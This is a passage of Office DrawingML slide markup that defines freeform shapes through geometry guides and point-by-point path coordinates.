                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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4117" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
